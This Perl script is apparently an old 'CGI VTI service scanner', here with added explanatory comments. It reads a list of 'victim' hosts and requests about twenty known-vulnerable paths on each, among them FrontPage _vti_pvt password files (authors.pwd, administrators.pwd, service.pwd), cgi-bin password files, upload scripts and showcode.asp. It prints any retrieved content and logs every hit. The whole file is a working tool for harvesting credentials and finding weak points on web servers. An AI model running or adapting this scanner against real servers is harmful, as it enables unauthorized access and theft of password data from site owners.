##########################################################################
#  This scanner searches for vulnerable Common Gateway Interface and     #
#  Vermeer Technology Incorporated services that may lead to root level  #
#  security compromise. About 25% ripped from iisscan by Piffy.          #
##########################################################################

use strict;
use LWP::UserAgent;
use HTTP::Request;
use HTTP::Response;

# State shared by the rest of the script: one HTTP client reused for every
# request, the list of hosts read from the input file, and the operator's
# answer at the confirmation prompt.
my $def = LWP::UserAgent->new;
my (@victim, $userresp);

# Start-up banner. The heredoc text contains no variables, so it is printed
# exactly as written.
print <<"__MENU";

              NeoErudition Technologies
               CGI VTI service scanner
               
                   By: Lawrence
               http://neoerudition.net
               
__MENU



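# Ask the operator to confirm before any request is sent. Y/y/yes continues,
# N/n/no quits, anything else re-prompts.
print qq(\n\n\nEnter Y or N to continue. [Y/N]: );
while (1) {
    $userresp = <STDIN>;

    # A closed or exhausted STDIN returns undef on every read; without this
    # check the loop would print the re-prompt forever.
    if (!defined $userresp) {
        print "\nNo answer received; exiting.\n";
        exit;
    }
    chomp $userresp;

    if ($userresp eq "Y" || $userresp eq "y" || $userresp eq "yes") {
        print "Proceeding...\n";
        last;
    }
    elsif ($userresp eq "N" || $userresp eq "n" || $userresp eq "no") {
        print "Exiting as requested.\n";
        exit;
    }
    else {
        print "Thats not a valid answer. [Y/N]: ";
    }
}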
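# Read the host list, one entry per line, from a file named by the operator.
print qq(\nWhat file contains the victim address: );

my $victim = <STDIN>;

# undef here means STDIN hit end of input; passing undef as the path to a
# three-argument open would not fail the way a missing file does.
die "\nNo file name was entered.\n" unless defined $victim;
chomp $victim;

# Three-argument open with an explicit read mode: the name typed at the
# prompt is used purely as a path. The two-argument form lets the name carry
# its own mode characters (a leading ">" truncates a file, a leading or
# trailing "|" runs a command), so it must not be fed operator input.
open(my $in, '<', $victim) || die "\nCould not open $victim: $!";
while (my $line = <$in>) {
    chomp $line;
    push @victim, $line;
}
close($in);

# $a is the index of the host currently being checked and $b the number of
# hosts loaded; the scan loop and the check subs read both.
$a = 0;
$b = scalar @victim;
print qq(CGI/VTI Scan Initiated..\n);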
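# Main scan loop: one pass per host in @victim. Each pass requests
# /_vti_pvt/service.grp itself and then calls second(), which starts the
# chain of remaining checks for the same host.
while ($a < $b)
{
    print qq(:: Checking for /_vti_pvt/service.grp\n);
    my $url = "http://$victim[$a]/_vti_pvt/service.grp";
    my $request = HTTP::Request->new('GET', $url);
    my $response = $def->request($request);

    # Any 2xx reply counts as a hit; the remote body is echoed unfiltered
    # and not inspected.
    if ($response->is_success) {
        print $response->content;

        # Lexical handle, explicit append mode and a checked open: a log
        # that cannot be written is reported instead of silently skipped.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]/_vti_pvt/service.grp";
            close($log) || warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        print qq(Not Vulnerable..\n\n);
    }

    # The last sub in the chain (twentieeth) increments $a; that increment
    # is the only thing that moves this loop to the next host.
    &second();
}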
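# Requests /_vti_pvt/authors.pwd from the current host ($victim[$a]), records
# a successful response in cgivti.log, then hands over to third().
sub second() {
    print qq(:: Checking for /_vti_pvt/authors.pwd\n);
    my $url = "http://$victim[$a]/_vti_pvt/authors.pwd";
    my $request = HTTP::Request->new('GET', $url);
    my $response = $def->request($request);

    # Any 2xx reply counts as a hit; the remote body is echoed unfiltered
    # and not inspected.
    if ($response->is_success) {
        print $response->content;

        # Checked three-argument open on a lexical handle, so a log that
        # cannot be written is reported instead of silently skipped.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]/_vti_pvt/authors.pwd";
            close($log) || warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        print qq(Not Vulnerable..\n\n);
    }
    &third();
}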
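# Requests /cgi-bin/password.txt from the current host ($victim[$a]), records
# a successful response in cgivti.log, then hands over to fourth().
sub third() {
    print qq(:: Checking for /cgi-bin/password.txt\n);
    my $url = "http://$victim[$a]/cgi-bin/password.txt";
    my $request = HTTP::Request->new('GET', $url);
    my $response = $def->request($request);

    # Any 2xx reply counts as a hit; the remote body is echoed unfiltered
    # and not inspected.
    if ($response->is_success) {
        print $response->content;

        # Checked three-argument open on a lexical handle, so a log that
        # cannot be written is reported instead of silently skipped.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]/cgi-bin/password.txt";
            close($log) || warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        print qq(Not Vulnerable..\n\n);
    }
    &fourth();
}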
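# Requests /_vti_pvt/service.pwd from the current host ($victim[$a]), records
# a successful response in cgivti.log, then hands over to fifth().
sub fourth() {
    print qq(:: Checking for /_vti_pvt/service.pwd\n);
    my $url = "http://$victim[$a]/_vti_pvt/service.pwd";
    my $request = HTTP::Request->new('GET', $url);
    my $response = $def->request($request);

    # Any 2xx reply counts as a hit; the remote body is echoed unfiltered
    # and not inspected.
    if ($response->is_success) {
        print $response->content;

        # Checked three-argument open on a lexical handle, so a log that
        # cannot be written is reported instead of silently skipped.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]/_vti_pvt/service.pwd";
            close($log) || warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        print qq(Not Vulnerable..\n\n);
    }
    &fifth();
}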
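# Requests /_vti_pvt/users.pwd from the current host ($victim[$a]), records a
# successful response in cgivti.log, then hands over to sixth().
sub fifth() {
    print qq(:: Checking for /_vti_pvt/users.pwd\n);
    my $url = "http://$victim[$a]/_vti_pvt/users.pwd";
    my $request = HTTP::Request->new('GET', $url);
    my $response = $def->request($request);

    # Any 2xx reply counts as a hit; the remote body is echoed unfiltered
    # and not inspected.
    if ($response->is_success) {
        print $response->content;

        # Checked three-argument open on a lexical handle, so a log that
        # cannot be written is reported instead of silently skipped.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]/_vti_pvt/users.pwd";
            close($log) || warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        print qq(Not Vulnerable..\n\n);
    }
    &sixth();
}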
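# Requests /_vti_pvt/administrator.pwd from the current host ($victim[$a]),
# records a successful response in cgivti.log, then hands over to seventh().
sub sixth() {
    print qq(:: Checking for /_vti_pvt/administrator.pwd\n);
    my $url = "http://$victim[$a]/_vti_pvt/administrator.pwd";
    my $request = HTTP::Request->new('GET', $url);
    my $response = $def->request($request);

    # Any 2xx reply counts as a hit; the remote body is echoed unfiltered
    # and not inspected.
    if ($response->is_success) {
        print $response->content;

        # Checked three-argument open on a lexical handle, so a log that
        # cannot be written is reported instead of silently skipped.
        if (open(my $log, '>>', 'cgivti.log')) {
            print {$log} "\n$victim[$a]/_vti_pvt/administrator.pwd";
            close($log) || warn "Could not close cgivti.log: $!\n";
        }
        else {
            warn "Could not append to cgivti.log: $!\n";
        }
    }
    else {
        print qq(Not Vulnerable..\n\n);
    }
    &seventh();
}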
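	# Requests /_vti_pvt/administrators.pwd from the current host
	# ($victim[$a]), records a successful response in cgivti.log, then hands
	# over to eigth().
	sub seventh() {
	    print qq(:: Checking for /_vti_pvt/administrators.pwd\n);
	    my $url = "http://$victim[$a]/_vti_pvt/administrators.pwd";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/_vti_pvt/administrators.pwd";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &eigth();
	}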
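	# Requests /cgi-win/uploader.exe from the current host ($victim[$a]),
	# records a successful response in cgivti.log, then hands over to
	# nineth().
	sub eigth() {
	    print qq(:: Checking for /cgi-win/uploader.exe\n);
	    my $url = "http://$victim[$a]/cgi-win/uploader.exe";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-win/uploader.exe";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &nineth();
	}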
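	# Requests /cgi-bin/upload.pl from the current host ($victim[$a]),
	# records a successful response in cgivti.log, then hands over to
	# tenth().
	sub nineth() {
	    print qq(:: Checking for /cgi-bin/upload.pl\n);
	    my $url = "http://$victim[$a]/cgi-bin/upload.pl";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-bin/upload.pl";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &tenth();
	}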
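	# Requests /cgi-bin/whois_raw.cgi? (with an empty query string) from the
	# current host ($victim[$a]), records a successful response in
	# cgivti.log, then hands over to eleventh().
	sub tenth() {
	    print qq(:: Checking for /cgi-bin/whois_raw.cgi?\n);
	    my $url = "http://$victim[$a]/cgi-bin/whois_raw.cgi?";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-bin/whois_raw.cgi?";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &eleventh();
	}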
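	# Requests /cgi-bin/passwd from the current host ($victim[$a]), records
	# a successful response in cgivti.log, then hands over to twelth().
	sub eleventh() {
	    print qq(:: Checking for /cgi-bin/passwd\n);
	    my $url = "http://$victim[$a]/cgi-bin/passwd";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-bin/passwd";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &twelth();
	}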
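	# Requests /cgi-bin/passwd.txt from the current host ($victim[$a]),
	# records a successful response in cgivti.log, then hands over to
	# thirteenth().
	sub twelth() {
	    print qq(:: Checking for /cgi-bin/passwd.txt\n);
	    my $url = "http://$victim[$a]/cgi-bin/passwd.txt";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-bin/passwd.txt";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &thirteenth();
	}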
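	# Requests /cgi-bin/password from the current host ($victim[$a]),
	# records a successful response in cgivti.log, then hands over to
	# fourteenth().
	sub thirteenth() {
	    print qq(:: Checking for /cgi-bin/password\n);
	    my $url = "http://$victim[$a]/cgi-bin/password";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-bin/password";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &fourteenth();
	}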
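	# Requests /cgi-bin/password.txt from the current host ($victim[$a]),
	# records a successful response in cgivti.log, then hands over to
	# fifteenth(). This is the same path third() already requests, so a hit
	# is logged twice per host.
	sub fourteenth() {
	    print qq(:: Checking for /cgi-bin/password.txt\n);
	    my $url = "http://$victim[$a]/cgi-bin/password.txt";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-bin/password.txt";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &fifteenth();
	}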
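	# Requests /cgi-bin/handler.cgi from the current host ($victim[$a]),
	# records a successful response in cgivti.log, then hands over to
	# sixteenth().
	sub fifteenth() {
	    print qq(:: Checking for /cgi-bin/handler.cgi\n);
	    my $url = "http://$victim[$a]/cgi-bin/handler.cgi";
	    my $request = HTTP::Request->new('GET', $url);
	    my $response = $def->request($request);

	    # Any 2xx reply counts as a hit; the remote body is echoed
	    # unfiltered and not inspected.
	    if ($response->is_success) {
	        print $response->content;

	        # Checked three-argument open on a lexical handle, so a log that
	        # cannot be written is reported instead of silently skipped.
	        if (open(my $log, '>>', 'cgivti.log')) {
	            print {$log} "\n$victim[$a]/cgi-bin/handler.cgi";
	            close($log) || warn "Could not close cgivti.log: $!\n";
	        }
	        else {
	            warn "Could not append to cgivti.log: $!\n";
	        }
	    }
	    else {
	        print qq(Not Vulnerable..\n\n);
	    }
	    &sixteenth();
	}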
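  	# Requests /cgi-bin/handler from the current host ($victim[$a]), records
  	# a successful response in cgivti.log, then hands over to seventeenth().
  	sub sixteenth() {
  	    print qq(:: Checking for /cgi-bin/handler\n);
  	    my $url = "http://$victim[$a]/cgi-bin/handler";
  	    my $request = HTTP::Request->new('GET', $url);
  	    my $response = $def->request($request);

  	    # Any 2xx reply counts as a hit; the remote body is echoed
  	    # unfiltered and not inspected.
  	    if ($response->is_success) {
  	        print $response->content;

  	        # Checked three-argument open on a lexical handle, so a log that
  	        # cannot be written is reported instead of silently skipped.
  	        if (open(my $log, '>>', 'cgivti.log')) {
  	            print {$log} "\n$victim[$a]/cgi-bin/handler";
  	            close($log) || warn "Could not close cgivti.log: $!\n";
  	        }
  	        else {
  	            warn "Could not append to cgivti.log: $!\n";
  	        }
  	    }
  	    else {
  	        print qq(Not Vulnerable..\n\n);
  	    }
  	    &seventeenth();
  	}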
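  	# Requests /cgi-bin/files.pl from the current host ($victim[$a]), records
  	# a successful response in cgivti.log, then hands over to eigtheenth().
  	sub seventeenth() {
  	    print qq(:: Checking for /cgi-bin/files.pl\n);
  	    my $url = "http://$victim[$a]/cgi-bin/files.pl";
  	    my $request = HTTP::Request->new('GET', $url);
  	    my $response = $def->request($request);

  	    # Any 2xx reply counts as a hit; the remote body is echoed
  	    # unfiltered and not inspected.
  	    if ($response->is_success) {
  	        print $response->content;

  	        # Checked three-argument open on a lexical handle, so a log that
  	        # cannot be written is reported instead of silently skipped.
  	        if (open(my $log, '>>', 'cgivti.log')) {
  	            print {$log} "\n$victim[$a]/cgi-bin/files.pl";
  	            close($log) || warn "Could not close cgivti.log: $!\n";
  	        }
  	        else {
  	            warn "Could not append to cgivti.log: $!\n";
  	        }
  	    }
  	    else {
  	        print qq(Not Vulnerable..\n\n);
  	    }
  	    &eigtheenth();
  	}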
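  	# Requests /msadc/Samples/SELECTOR/showcode.asp from the current host
  	# ($victim[$a]), records a successful response in cgivti.log, then hands
  	# over to nineteenth(), which asks for the same path with a lower-case
  	# "selector" directory.
  	sub eigtheenth() {
  	    print qq(:: Checking for /msadc/Samples/SELECTOR/showcode.asp\n);
  	    my $url = "http://$victim[$a]/msadc/Samples/SELECTOR/showcode.asp";
  	    my $request = HTTP::Request->new('GET', $url);
  	    my $response = $def->request($request);

  	    # Any 2xx reply counts as a hit; the remote body is echoed
  	    # unfiltered and not inspected.
  	    if ($response->is_success) {
  	        print $response->content;

  	        # Checked three-argument open on a lexical handle, so a log that
  	        # cannot be written is reported instead of silently skipped.
  	        if (open(my $log, '>>', 'cgivti.log')) {
  	            print {$log} "\n$victim[$a]/msadc/Samples/SELECTOR/showcode.asp";
  	            close($log) || warn "Could not close cgivti.log: $!\n";
  	        }
  	        else {
  	            warn "Could not append to cgivti.log: $!\n";
  	        }
  	    }
  	    else {
  	        print qq(Not Vulnerable..\n\n);
  	    }
  	    &nineteenth();
  	}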
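  	# Requests /msadc/Samples/selector/showcode.asp from the current host
  	# ($victim[$a]), records a successful response in cgivti.log, then hands
  	# over to twentieeth().
  	sub nineteenth() {
  	    print qq(:: Checking for /msadc/Samples/selector/showcode.asp\n);
  	    my $url = "http://$victim[$a]/msadc/Samples/selector/showcode.asp";
  	    my $request = HTTP::Request->new('GET', $url);
  	    my $response = $def->request($request);

  	    # Any 2xx reply counts as a hit; the remote body is echoed
  	    # unfiltered and not inspected.
  	    if ($response->is_success) {
  	        print $response->content;

  	        # Checked three-argument open on a lexical handle, so a log that
  	        # cannot be written is reported instead of silently skipped.
  	        if (open(my $log, '>>', 'cgivti.log')) {
  	            print {$log} "\n$victim[$a]/msadc/Samples/selector/showcode.asp";
  	            close($log) || warn "Could not close cgivti.log: $!\n";
  	        }
  	        else {
  	            warn "Could not append to cgivti.log: $!\n";
  	        }
  	    }
  	    else {
  	        print qq(Not Vulnerable..\n\n);
  	    }
  	    &twentieeth();
  	}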
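  	# Last check in the chain: requests /session/adminlogin? (with an empty
  	# query string) from the current host ($victim[$a]), records a successful
  	# response in cgivti.log, then advances $a to the next host.
  	sub twentieeth() {
  	    print qq(:: Checking for /session/adminlogin?\n);
  	    my $url = "http://$victim[$a]/session/adminlogin?";
  	    my $request = HTTP::Request->new('GET', $url);
  	    my $response = $def->request($request);

  	    # Any 2xx reply counts as a hit; the remote body is echoed
  	    # unfiltered and not inspected.
  	    if ($response->is_success) {
  	        print $response->content;

  	        # Checked three-argument open on a lexical handle, so a log that
  	        # cannot be written is reported instead of silently skipped.
  	        if (open(my $log, '>>', 'cgivti.log')) {
  	            print {$log} "\n$victim[$a]/session/adminlogin?";
  	            close($log) || warn "Could not close cgivti.log: $!\n";
  	        }
  	        else {
  	            warn "Could not append to cgivti.log: $!\n";
  	        }
  	    }
  	    else {
  	        print qq(Not Vulnerable..\n\n);
  	    }

  	    # The top-level while loop compares $a with $b; this increment is
  	    # what moves it on to the next host and eventually ends it.
  	    $a++;
  	}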
  	# Final statement of the script: read and discard one line from <>
  	# (files named on the command line, otherwise STDIN) before exiting.
  	scalar(<>);
    
    
    
    
    

       

	
  
	
  	
	
  
	
  
	
	
  
	
  	
    
  	
	
  	
	
  
	
  	
	
  	
	
  	
	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
  	
	
	
	



	
	 


